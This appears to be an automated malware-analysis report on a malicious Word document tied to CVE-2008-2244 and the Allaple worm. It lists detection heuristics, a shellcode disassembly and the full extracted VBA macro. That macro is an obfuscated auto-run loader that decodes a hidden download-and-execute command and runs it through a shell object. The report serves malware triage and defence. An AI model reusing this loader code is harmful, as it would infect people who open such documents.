Verdict: MALICIOUS
Risk Score: 710
Malware Insights
MITRE ATT&CK
T1204.002 Malicious File
T1059.005 Visual Basic
T1105 Ingress Tool Transfer
T1027 Obfuscated Files or Information
T1203 Exploitation for Client Execution
The sample is a malicious Microsoft Word document exploiting CVE-2008-2244 to deliver a PE executable. The VBA macro contains an obfuscated loader that likely executes the embedded payload. ClamAV identified the sample as Win.Worm.Allaple-303, and an embedded executable was also detected by ClamAV.
Heuristics (18)

- CVE-2008-2244: Microsoft Word record-parsing payload (critical, likely) [CVE_2008_2244]
  Word OLE document has normal small WordDocument/table streams, a large unallocated OLE slack region, and an executable or resolver shellcode payload in that slack. This is the static shape of the MS08-042 Word record-parsing exploit family tracked as CVE-2008-2244.
- ClamAV: Win.Worm.Allaple-303 (critical) [CLAMAV_DETECTION]
  ClamAV detected this file as malware: Win.Worm.Allaple-303
- Embedded PE executable (critical) [OLE_EMBEDDED_EXE]
  MZ/PE header found inside document — possible embedded executable
- VBA macros detected (medium, 4 related findings) [OLE_VBA_MACROS]
  Document contains VBA macro code
- Obfuscated auto-exec VBA loader (critical) [OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER]
  Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
  Matched lines in script:
    End If
    erodesolve = GetObject(Join(licensewalk, "")).Run(ylkasflqeeerx, isdltfbtnozfmnvfavs)
    Dim elderinhale As Integer
- GetObject call (high) [OLE_VBA_GETOBJ]
  Matched lines in script:
    End If
    erodesolve = GetObject(Join(licensewalk, "")).Run(ylkasflqeeerx, isdltfbtnozfmnvfavs)
    Dim elderinhale As Integer
- VBA p-code auto-exec with execution tokens (high) [OLE_VBA_PCODE_AUTOEXEC_EXEC]
  Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Document_Open macro (low) [OLE_VBA_DOCOPEN]
  Matched lines in script:
    Attribute VB_Customizable = True
    Public Sub Document_Open()
    Dim hillunknown As Double
- x86 GetPC stub (CALL $+5; POP EBX) (high) [SC_GETPC_CALL]
  Disassembly (attempted x86 opcode disassembly):
    00087B0B e800000000 call 0x87b10
    00087B10 5b pop ebx
    00087B11 b969030000 mov ecx, 0x369
    00087B16 03d9 add ebx, ecx
    00087B18 50 push eax
    00087B19 53 push ebx
    00087B1A e8b2020000 call 0x87dd1
    00087B1F 5e pop esi
    00087B20 5d pop ebp
    00087B21 8b36 mov esi, dword ptr [esi]
    00087B23 8bfd mov edi, ebp
    00087B25 03bd55fdffff add edi, dword ptr [ebp - 0x2ab]
    00087B2B 8bdf mov ebx, edi
    00087B2D 833f00 cmp dword ptr [edi], 0
    00087B30 750a jne 0x87b3c
    00087B32 83c704 add edi, 4
    00087B35 b900000000 mov ecx, 0
    00087B3A eb16 jmp 0x87b52
    00087B3C b901000000 mov ecx, 1
    00087B41 033b add edi, dword ptr [ebx]
    00087B43 83c304 add ebx, 4
    00087B46 833b00 cmp dword ptr [ebx], 0
    00087B49 7436 je 0x87b81
    00087B4B 0113 add dword ptr [ebx], edx
    00087B4D 8b33 mov esi, dword ptr [ebx]
    00087B4F 037b04 add edi, dword ptr [ebx + 4]
    00087B52 57 push edi
    00087B53 51 push ecx
    00087B54 52 push edx
    00087B55 53 push ebx
    00087B56 ffb501feffff push dword ptr [ebp - 0x1ff]
    00087B5C ffb5fdfdffff push dword ptr [ebp - 0x203]
    00087B62 8bd6 mov edx, esi
    00087B64 8bcf mov ecx, edi
    00087B66 8b .byte 0x8b
    00087B67 85 .byte 0x85
    00087B68 8d .byte 0x8d
    00087B69 fd std
    00087B6A ff .byte 0xff
- Reference to ShellExecute API (high) [SC_STR_SHELLEXEC]
- Reference to LoadLibrary API (high) [SC_STR_LOADLIBRARY]
- Reference to GetProcAddress API (high) [SC_STR_GETPROCADDRESS]
- OLE document has large unaccounted-for region (high) [OLE_SLACK_ANOMALY]
  OLE file is 709,440 bytes but its declared streams total only 215,308 bytes — 494,132 bytes (70%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
- OLE file has appended executable-looking payload bytes (high) [OLE_APPENDED_PAYLOAD]
  OLE compound file contains a large high-entropy region beyond the declared major streams, and that region includes shellcode, PE, or loader API markers. This is a payload-carrier signal, not a specific CVE attribution by itself.
- Reference to VirtualAlloc API (medium) [SC_STR_VIRTUALALLOC]
- Reference to VirtualProtect API (medium) [SC_STR_VIRTUALPROTECT]
- Suspicious extracted artifact (medium) [EXTRACTED_FILE_STATIC_TRIAGE]
  One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info) [EMBEDDED_URL]
  One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (2)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 8238 bytes |

SHA-256: 13f6b02f3cfcceb48fa00ea1ccad2e286d7b27f0e9d0832431fd49a85df0024d

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Public Sub Document_Open()
Dim hillunknown As Double
Dim dragonmisery As Long
hillunknown = 259
dragonmisery = 333
'erosionpoem
If hillunknown <> dragonmisery Then
Dim ounogxmljoufe As Integer
ounogxmljoufe = 556
'bljbswgvkgoc
Dim shinevendor As String
shinevendor = "imposemachine"
'apartugly
End If
Dim mammalwait As Double
Dim erlqvgwbwkxporjpq As Long
mammalwait = 845
erlqvgwbwkxporjpq = 55
'trpcqkaavfzurvdfh
If mammalwait <> erlqvgwbwkxporjpq Then
Dim xvdyhscfqepi As Integer
xvdyhscfqepi = 785
'actressthey
Dim coverleft As String
coverleft = "blanketbuyer"
'eternalurge
End If
Selection.TypeText ("It is a long established fact that a reader will be distracted by the readable content of a page when looking at its layout. The point of using Lorem Ipsum is that it has a more-or-less normal distribution of letters, as opposed to using 'Content here, content here', making it look like readable English." & vbCrLf)
Dim gravityprovide As Integer
gravityprovide = 526
'onrfswzagtxvzkvtin
Dim silksoup As String
silksoup = "uorwbkmpvsqdqow"
inhaletrend = blamestart()
Dim myvfcjaelozo As Integer
myvfcjaelozo = 450
'cramlegend
Dim sokomcszqjphw As String
sokomcszqjphw = "cupboardscrub"
Dim pilotwage As Integer
pilotwage = 909
'sausagesmile
Dim affairremove As String
affairremove = "acquirecave"
kvaovbcbvlszoxy = Len(inhaletrend)
Dim fatherhuman As Integer
fatherhuman = 303
'championpicture
Dim xnpsviohvmelhhbmws As String
xnpsviohvmelhhbmws = "vphhswedfkmevoyaiip"
zhiqfcaxsjpgfepeb = ""
For gorxdtehgz = 1 To kvaovbcbvlszoxy
Dim xcsixmnldwouqwa As Integer
xcsixmnldwouqwa = 691
'lqnncrkbnwdn
Dim illsmile As String
illsmile = "bodymodify"
Dim cakecattle As Integer
cakecattle = 525
'tbzqnnnsfh
Dim itstpnqxuepb As String
itstpnqxuepb = "bleaktwin"
If Not "QXuXA6B0vAv70V" Like "*" & Mid(inhaletrend, gorxdtehgz, 1) & "*" Then
Dim yvemxugmwakolz As Double
Dim enrichshuffle As Long
yvemxugmwakolz = 468
enrichshuffle = 905
'xxxkwhrlu
If yvemxugmwakolz <> enrichshuffle Then
Dim phzahqxnpwhzxvbizdo As Integer
phzahqxnpwhzxvbizdo = 315
'puehklsgy
Dim allowmarine As String
allowmarine = "zcininxfehiftkuxmlb"
'pieceready
End If
Dim aspectrenew As Integer
aspectrenew = 976
'svgtxcgrg
Dim providesound As String
providesound = "chiefwave"
zhiqfcaxsjpgfepeb = zhiqfcaxsjpgfepeb & Mid(inhaletrend, gorxdtehgz, 1)
Dim expandprotect As Double
Dim xmakganughubyjskx As Long
expandprotect = 631
xmakganughubyjskx = 700
'kitethen
If expandprotect <> xmakganughubyjskx Then
Dim hexqgqdpbv As Integer
hexqgqdpbv = 712
'wttwunthtydcmd
Dim nkoyvexlmthpsz As String
nkoyvexlmthpsz = "ayzciyhgdmxahrv"
'firstspy
End If
End If
Dim enhancepole As Double
Dim naturevanish As Long
enhancepole = 466
naturevanish = 818
'fwjyrzfkefmiuxoxl
If enhancepole <> naturevanish Then
Dim emotionjob As Integer
emotionjob = 151
'definegrab
Dim mxitmqhwy As String
mxitmqhwy = "jlpynpdihi"
'ftsfrlslm
End If
Next
Dim hamsterroute As Double
Dim awareorange As Long
hamsterroute = 833
awareorange = 814
'yjmvjzceaggektdrqbg
If hamsterroute <> awareorange Then
Dim boyscatter As Integer
boyscatter = 946
'cerealnever
Dim boilecho As String
boilecho = "qzdhbpmeojec"
'commongame
End If
gluetrick = Module1.erodesolve(zhiqfcaxsjpgfepeb, 0)
Dim okaysurprise As Integer
okaysurprise = 408
'ucuohgqotnyn
Dim idleoffer As String
idleoffer = "loungenest"
With ActiveDocument.InlineShapes
Do While .Count > 0
.Item(1).Delete
Dim nqqsvnaysvimhjjit As Double
Dim hmzblwpmq As Long
nqqsvnaysvimhjjit = 702
hmzblwpmq = 529
'etijehamkyvisazt
If nqqsvnaysvimhjjit <> hmzblwpmq Then
Dim clarifycrazy As Integer
clarifycrazy = 100
'afasepeexiyw
Dim palacepaper As String
palacepaper = "enoughpublic"
'giraffevibrant
End If
Loop
Dim coiltotal As Double
Dim termtree As Long
coiltotal = 116
termtree = 393
'mghooevfbjoveevcqe
If coiltotal <> termtree Then
Dim clawemotion As Integer
clawemotion = 615
'differendorse
Dim chefcook As String
chefcook = "rjgewhcutgwrkweqc"
'fmoarwlpkpqbs
End If
End With
Dim fosterpanda As Integer
fosterpanda = 970
'gdortiyfpryhuolqqbo
Dim wpgaezsxqp As String
wpgaezsxqp = "nfxbjbzyjilzdeaqgnp"
End Sub
Function blamestart()
Dim vcubkuelczq As Integer
vcubkuelczq = 715
'demisefine
Dim hpaakswftb As String
hpaakswftb = "qklzjnzoydpu"
Dim qfyeaywzu As Double
Dim archfaculty As Long
qfyeaywzu = 62
archfaculty = 799
'burdenleisure
If qfyeaywzu <> archfaculty Then
Dim ahfrrvcgpii As Integer
ahfrrvcgpii = 644
'federaltruth
Dim tnixoramno As String
tnixoramno = "featurereturn"
'greatgrocery
End If
zhiqfcaxsjpgfepeb = "6.0fBi0lAeXXbXXo66x7.Q7m7AoVuev/V6iVt7XcAtAkV6sBX.7eu0xXeQ'u0,0V'B%XATAE0MvuPQV%u0\0\"
Dim appearcanvas As Integer
appearcanvas = 706
'vuiotbvez
Dim asmxbwxmcctamtot As String
asmxbwxmcctamtot = "jlfdtcngazyxwlrhv"
wvsijuqagujeaoyd = "AAMvSB6oAfAAf60iVvcue7.veXxQuev'A6)X Au&0 v7%XTQ7EvMvPA%B"
inhaletrend = "B6c0mQdXV.VveXxQe0Q Q0/ucBu 7pXoAwVe6rusV6h60eXlQAlX6.v0e7vxBeA6 A-A0wQ QuhviQAd7d7eBXnv6 X7-XXnAovVpB0 Qv-6eupV0 vb0yQpB6aXvsQBsV V(7NAueuAw07-uuOubQvjQev6cXtQ6 0Suy0QsXXtVveXBmQX.vVNBeXtvB.QWQe0Ab77CXXl0iVeVAnVVtA)0.BuDBAo7w7Xn0lX7o00avd7FvBiQulAveV(A'vVh0tVt0pBsA:A/7/Xvd0"
cfcqqoyogs = "u7fXfAivXc0eV.vvevx7e"
Dim tobaccotrash As Double
Dim globepupil As Long
tobaccotrash = 345
globepupil = 979
'xmbyafvomehuc
If tobaccotrash <> globepupil Then
Dim faithgrid As Integer
faithgrid = 392
'lahescesqfl
Dim absentlobster As String
absentlobster = "lodedmogdc"
'officepipe
End If
Dim mwgppxzjz As Double
Dim angerfresh As Long
mwgppxzjz = 26
angerfresh = 461
'recallshiver
If mwgppxzjz <> angerfresh Then
Dim edrrdwvgzgqwq As Integer
edrrdwvgzgqwq = 70
'aexocumpmelktfdn
Dim destroyspoon As String
destroyspoon = "pulpthrow"
'eeuwpuijfrf
End If
blamestart = inhaletrend & zhiqfcaxsjpgfepeb & wvsijuqagujeaoyd & "\A\0MuSA0o" & cfcqqoyogs
Dim uokxoecaxssfbxyct As Integer
uokxoecaxssfbxyct = 180
'grabmercy
Dim zbqetbzkqdjwk As String
zbqetbzkqdjwk = "cleanfault"
End Function
Attribute VB_Name = "Module1"
Function erodesolve(ylkasflqeeerx, isdltfbtnozfmnvfavs)
Dim licensewalk(3)
Dim ziqxahmzfhc As Double
Dim taqkhvgbrbxg As Long
ziqxahmzfhc = 951
taqkhvgbrbxg = 158
'czqyrdlqjuwr
If ziqxahmzfhc <> taqkhvgbrbxg Then
Dim bunkerperfect As Integer
bunkerperfect = 976
'cangqlnvdbxo
Dim hnrhwbedug As String
hnrhwbedug = "dbmxnwhjy"
'affeshejwfkskbanj
End If
Dim ylycmxxypwlppd As Double
Dim rdjmgwuskohwillld As Long
ylycmxxypwlppd = 75
rdjmgwuskohwillld = 866
'sickslide
If ylycmxxypwlppd <> rdjmgwuskohwillld Then
Dim anydetect As Integer
anydetect = 144
'bdpvpraeof
Dim bnvnhcfmpvnmutukly As String
bnvnhcfmpvnmutukly = "zhtymljtrupkpep"
'dadgossip
End If
licensewalk(0) = "new:{72C24DD5-D70A-438"
licensewalk(1) = "B-8A42-98424B88A"
Dim reviewscrap As Integer
reviewscrap = 449
'qbqekalyqswgcnqjbfg
Dim metalshiver As String
metalshiver = "wmwrmyrjkmrscfugqe"
Dim dovespice As Double
Dim tpnmcvlzwzgqbtfz As Long
dovespice = 384
tpnmcvlzwzgqbtfz = 833
'hvdkaucdc
If dovespice <> tpnmcvlzwzgqbtfz Then
Dim clusterowner As Integer
clusterowner = 248
'eqyuljasoam
Dim hdzcvflzauqq As String
hdzcvflzauqq = "clockjuice"
'manupdate
End If
licensewalk(2) = "FB8}"
Dim wpfwtqhqyvz As Double
Dim vuskughgn As Long
wpfwtqhqyvz = 415
vuskughgn = 701
'sillyvictory
If wpfwtqhqyvz <> vuskughgn Then
Dim coppercrash As Integer
coppercrash = 973
'dptgdjoiujhepvt
Dim ycxqqxyxxdrcem As String
ycxqqxyxxdrcem = "closehurdle"
'pzdhbqally
End If
erodesolve = GetObject(Join(licensewalk, "")).Run(ylkasflqeeerx, isdltfbtnozfmnvfavs)
Dim elderinhale As Integer
elderinhale = 73
'lessonthrow
Dim steakvoid As String
steakvoid = "chestjaguar"
End Function

| Filename | Kind | Source | Size |
|---|---|---|---|
| embedded_office_00036000.exe | embedded-pe | Office MZ+PE at offset 0x36000 | 488256 bytes |

SHA-256: a03cfd589a31d5cd9271d562428655d43422f9158d0c169b8c13a1de00fc9a4a
Detection
ClamAV: Win.Worm.Allaple-303
Obfuscation or payload: likely
Static shellcode analysis found candidate code region(s). Indicators: SC_STR_GETPROCADDRESS, SC_STR_LOADLIBRARY, SC_STR_SHELLEXEC.
Static shellcode analysis recovered API/import strings: GetProcAddress, VirtualAlloc, VirtualProtect, ExitProcess, advapi32.dll, shell32.dll.